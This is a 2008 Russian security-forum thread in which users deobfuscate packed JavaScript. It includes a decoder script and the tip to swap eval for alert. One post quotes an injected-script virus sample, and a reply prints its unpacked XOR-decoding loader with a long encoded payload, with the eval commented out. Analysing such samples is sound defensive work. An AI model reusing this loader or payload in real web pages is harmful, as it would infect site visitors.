ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.02.2008, 04:25
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 284
Провел на форуме:
684402
Репутация:
117
|
|
ого. Честно говоря для меня теперь загадка, каким ху.. образом браузер это интерпретирует 0_о
|
|
|
13.02.2008, 08:16
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 284
Провел на форуме:
684402
Репутация:
117
|
|
Пасип, суть понял, прочитав описание метода eval()
Ну не кодер я  Пробовал, знаком, кое чего даже могу, но не кодер..увы |
|
|
|
13.02.2008, 10:28
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
http://dump.ru/files/o/o601039227/
пасс тот же
Приводится в читаемый вид довольно просто (не сложно догадаться, что я использовал textarea, а там был закрывающий тэг), тем более, что используется всем известный пакер.
P.S. иногда бывает полезно переписать стандартные функции, чтобы не заменять в коде каждый их вызов,например так:
Код:
eval = function(s)
{
alert(s);
}
Конечно, это нужно делать до запуска исследуемого скрипта.
P.P.S А чтобы было сложно разобраться в коде, не "шифруйте" скрипты за счёт работы со строками и всяких преобразований - это бессмысленно.
Используйте прототипирование. Очень полезно.
И сразу становится проще самому написать. |
|
|
|
22.07.2008, 02:14
|
|
Новичок
Регистрация: 13.04.2008
Сообщений: 9
Провел на форуме:
54274
Репутация:
0
|
|
Пожалуйста расшифруйте JS-скрипт
http://dump.ru/file_catalog/958568
|
|
|
|
22.07.2008, 02:53
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
dx4r,
Код:
<script type="text/javascript">
function decodetest(){
//get the input
var t = document.getElementById('dectest').value;
//remove carriage returns
t = t.replace(new RegExp("\\=\r\n","gim"), "");
//replace urlencoded values
t = unescape(t);
//replacement values
var thechrs = new Array(
' ','!','"','#','$','%','&',"'",'(',')','*','+',',','-','.','/','0','1','2','3',
'4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G',
'H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[',
'\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',' ','c','u','e','a',
'a','a','a','c','e','e','e','i','i','i','a','a','e','ae','ae','o','o','o','u','u',
'y','u','u','o','l','0','x','f','a','i','o','u','n','n','*','O','?','r','_','?',
'?','!','<','>','_','_','_','|','|','a','a','a','c','|','|','+','+','c','y','+',
'+','-','-','+','-','+','a','a','+','+','-','-','|','-','+','.','.','d','e','e',
'e','i','i','i','i','+','+','_','_','|','i','_','o','o','o','o','o','o','u','p',
'p','u','u','u','y','y','_',"'",'-','?','_','?','?','S','÷','¸','°','¨','·','¹',
'³','²','_',' ');
//replace js numeric array values
var l = 32;
for (l = 32; l < 256; l++){
t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ",");
}
for (l = 32; l < 256; l++){
t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]");
}
for (l = 32; l < 256; l++){
t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ",");
}
ta = t;
t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
while(ta !== t){
ta = t;
t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2");
}
//replace entities
var l = 32;
for (l = 32; l < 100; l++){
t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]);
t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]);
}
var l = 100;
for (l = 100; l < 256; l++){
t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]);
t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]);
}
//return results
document.getElementById("parsed").innerHTML = t;
}
</script>
|
|
|
|
22.07.2008, 12:14
|
|
Новичок
Регистрация: 13.04.2008
Сообщений: 9
Провел на форуме:
54274
Репутация:
0
|
|
n0ne, а как вы ево расшифровали, и почему он в таком виде не работает?
|
|
|
|
22.07.2008, 12:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
А кто вот этот вирусок расшифрует? Прикрепляется в конец файла ****
Вот как он выглядит (вырезал середину):
Код HTML:
<!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\ ... x37\x64\x27\x29\x3b');</script><!-- end -->
http://ifolder.ru/7042045
http://rapidshare.com/files/123665937/virus_help_.rar
http://depositfiles.com/files/6091668 |
|
|
|
22.07.2008, 13:14
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Замени eval на alert
Код:
function wFh (gBZfU) {
function aVET (uEeYZ) {
var wzflAe = 0;
var huL = uEeYZ.length;
var eEUIOL = 0;
while (eEUIOL < huL) {
wzflAe += gIsqvl (uEeYZ, eEUIOL) * huL;
eEUIOL++;
}
return (wzflAe + '');
}
function gIsqvl (nOI, ierOXSV) {
return nOI.charCodeAt (ierOXSV);
}
try {
var jGMOy = eval ('aDrzgouzmoefnDtfso.fcfaDlolzebeo'.replace (/[fzoDb]/g, ''));
var whT = new String ();
var gDI = 0;
yQyUmy = 0, vTkBMe = (new String(jGMOy)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
var tDGIej = aVET (vTkBMe);
gBZfU = unescape (gBZfU);
for (var mGtHBvkh = 0; mGtHBvkh < (gBZfU.length); mGtHBvkh++){
var hFgH = gIsqvl (vTkBMe,gDI) ^ gIsqvl (tDGIej, yQyUmy);
var qKpcSA = gIsqvl (gBZfU, mGtHBvkh);
yQyUmy++;
gDI++;
if (yQyUmy > tDGIej.length)
yQyUmy = 0;
if (gDI > vTkBMe.length)
gDI = 0;
whT += String.fromCharCode (qKpcSA ^ hFgH);
}
alert (escape(whT)); //добавлено мной
//eval(whT); // закоментировано тоже мной :)
return whT = new String();
} catch (e){}
}
wFh ('%33%33%36%37%36%33%36%32%57%3b%09%79%5c%17%28%58%1a%27%73%20%30%31%2d%32%23%1d%35%02%66%4e%72%14%0e%25%27%34%36%28%3d%3e%22%04%4a%64%5b%61%3d%36%15%20%02%3a%04%34%35%76%28%2f%30%35%7e%20%0d%29%6b%17%0d%1c%09%17%67%19%2f%74%36%3d%30%17%17%12%20%11%75%2b%14%32%3d%6b%7e%33%33%20%0a%36%29%65%78%2f%31%22%1a%4e%30%74%4c%4c%54%68%54%73%6b%1f%3f%1e%43%46%72%5f%66%74%63%3f%3d%78%21%16%3d%7f%4a%6f%70%61%2d%3f%10%3f%3a%31%3e%1a%24%60%6d%4c%62%5c%0b%73%36%25%6a%1a%3d%14%37%25%3c%26%15%30%2e%07%12%1d%30%7d%7e%68%64%56%48%7e%76%5c%63%3b%3a%2c%53%2a%05%15%2e%24%2c%20%77%68%45%2f%20%18%63%29%75%7a%67%4f%5a%1c%63%7c%7e%68%6b%76%41%24%30%28%1f%23%36%20%7d%06%7a%0c%7e%7d%5d%73%7e%70%5d%7f%71%73%73%38%63%7d%60%4c%79%70%27%39%25%2f%5c%37%02%6b%17%36%2b%25%08%16%2e%0c%2a%07%6a%6c%7f%76%71%66%4f%63%74%59%5e%72%22%0e%38%7b%36%25%75%6f%60%4c%7d%04%25%3f%2e%7d%30%04%33%2c%60%13%78%3e%14%0e%2b%2b%76%24%36%37%2d%3e%3a%34%53%6d%3f%1c%76%70%6c%02%72%06%07%34%05%65%22%7b%33%77%2d%7f%47%71%56%35%61%71%50%06%53%1d%66%01%42%0b%66%08%44%35%62%7d%71%04%6b%34%6c%0b%27%0e%05%01%0a%09%06%75%39%6c%22%44%66%70%03%26%0e%1d%21%3a%0d%2b%71%2a%1a%38%01%1c%71%4d%09%5e%0b%7d%43%3a%7d%7e%42%3b%7a%79%7d%4a%21%11%02%5e%2e%3a%32%76%2d%66%40%6e%21%68%16%7e%2f%6b%74%69%09%40%4c%1d%7d%68%24%15%0c%21%3b%68%0f%21%2f%2a%59%17%17%0a%36%6d%67%2b%2e%12%33%65%04%33%2f%23%13%2b%78%4c%59%04%54%2c%22%2f%3d%20%1c%41%4a%57%33%6a%59%79%09%11%30%1e%29%24%47%21%58%23%63%34%28%08%3f%31%2a%1e%03%0d%2c%0d%26%1b%1d%1b%37%79%22%7e%03%28%3a%21%2b%26%0d%21%4f%44%31%71%3a%25%24%05%11%64%75%70%15%14%31%6d%32%36%32%13%69%38%3e%1c%14%6a%24%74%3d%0e%23%21%26%17%32%30%20%1a%35%2d%5b%3c%38%2e%1e%34%01%18%23%10%22%75%4b%57%7d%7b%73%5b%78%61%23%37%28%29%7a%22%39%2d%29%2d%38%17%3b%38%28%33%68%44%7f%7c%7f%71%56%79%69%3f%78%36%39%45%20%4f%7a%31%03%26%6c%3c%23%47%41%7a%58%0f%10%0d%29%64%72%11%22%2a%35%38%34%00%5b%49%2e%2a%7f%33%11%01%67%26%18%55%32%73%57%75%21%6c%7b%29%06%35%0b%22%1e%3f%4a%56%3c%0a%23%33%32%37%37%2a%39%68%4c%0d%0f%19%50%5b%77%29%33%1a%71%37%3f%00%06%1b%1d%07%21%28%0c%35%2c%3c%33%12%33%4f%53%69%3c%37%3b%34%53%24%64%4b%23%0b%16%0b%13%5d%08%00%66%5c%20%1a%17%59%00%16%1e%3e%22%1b%78%17%18%6b%0c%08%51%3f%73%31%30%20%2a%37%37%3c%3c%06%0b%7d%66%34%34%20%5e%71%7c%37%67%20%49%09%68%19%6a%0d%2b%1c%3b%7b%0f%6a%7c%74%33%0e%21%53%79%0e%16%56%35%07%31%0b%41%06%3d%71%2f%63%61%33%32%31%30%14%2e%19%62%7c%1a%3f%07%18%2a%56%6a%09%76%25%60%7e%7e%70%4f%76%03%2a%38%36%72%7f%31%17%13%20%13%36%3c%0a%1e%1b%4a%7f%77%3a%19%74%07%64%64%5f%78%7a%18%31%5c%37%05%6c%32%33%05%2c%60%07%19%6d%6b%6f%03%6e%71%3d%66%2c%68%36%49%49%2e%24%60%15%2f%13%33%18%60%7a%68%4c%06%25%27%79%2a%0a%7b%52%1e%6b%3d%74%75%4d%53%57%42%3a%6a%38%73%39%1a%33%22%73%18%6a%7a%23%61%58%67%17%75%19%52%72%34%70%17%7a%2b%7f%6c%79%18%5f%0c%17%30%26%05%5a%11%6c%59%36%6c%1d%3a%3e%06%09%7d%4a%7c%13%35%21%21%35%2e%7e%34%59%21%31%09%33%2d%29%20%39%34%43%03%35%17%01%25%70%79%3e%04%1c%69%0a%1c%2d%26%32%7b%7c%2a%69%20%7b%74%39%1b%31%0a%22%1d%4f%6d%59%5f%32%3c%18%29%33%27%3a%58%7b%25%2b%15%6e%01%27%32%1d%48%3a%5c%6d%71%38%78%58%0c%7f%58%7d%01%6a%7c%20%05%1e%0a%37%13%55%14%5c%11%5e%78%65%63%3b%39%36%26%2b%0a%09%51%6f%0b%54%6c%37%3f%20%18%08%33%02%04%71%2f%09%0f%28%1b%2b%79%24%4d%2d%4f%7a%68%73%5b%52%14%21%22%0e%3d%4d%2d%2a%32%07%1b%15%38%34%7d%77%27%34%0e%34%75%2c%09%20%0d%32%2e%7e%3b%38%34%5f%5f%31%0a%30%31%50%35%77%34%38%34%34%10%09%38%02%1a%2e%7a%26%1f%4d%07%24%2e%1b%3f%77%3e%2d%38%4d%4a%7b%31%30%1b%3f%26%3e%1e%16%6b%3b%05%1a%3e%5c%75%3e%37%29%22%3e%68%20%14%21%17%67%22%79%79%2f%3e%15%7c%21%25%14%27%6d%76%66%71%35%4f%34%35%2a%06%5f%38%26%74%0d%22%2d%79%1d%20%01%3b%7d%6b%47%32%06%25%17%34%38%23%41%75%7d%7c%41%4b%51%77%47%55%5a%59%70%7f%7f%64%28%3b%0f%07%3b%63%2f%23%6f%3d%28%23%2d%1f%36%4e%51%3d%34%36%03%31%67%75%61%75%7c%71%57%7e%5a%19%09%64%20%2b%3a%76%13%37%1a%16%1b%50%54%7c%7c%6c%21%31%20%32%05%33%22%46%51%69%21%74%36%1c%11%22%3c%7f%22%04%0a%10%1e%57%77%7c%6c%2b%5a%00%11%16%14%2d%32%3a%27%2c%3d%7a%6b%36%3c%17%04%30%2e%3f%36%65%76%3a%33%08%11%29%22%17%3b%31%0c%1e%16%6b%7a%34%19%1a%08%5a%67%4a%25%2f%3e%31%37%0f%0b%32%00%35%7d%63%09%62%21%32%01%54%35%35%2c%17%53%0e%05%31%52%04%17%7f%6c%67%1b%18%15%16%78%2c%39%28%23%16%28%24%4f%75%7d');</script>
Последний раз редактировалось krypt3r; 22.07.2008 в 14:36..
|
|
|
|
22.07.2008, 15:18
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
Такой вопрос...
h_ttp://www.bananascript.com/index.php?compress
ведь его тоже можно для "шифровки" использовать?
|
|
|
|
22.07.2008, 16:34
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
Ничего себе археологи... какую темку откопали...
Свою создать было не судьба?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.jpg?783250){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
Похожие темы
Линейный вид
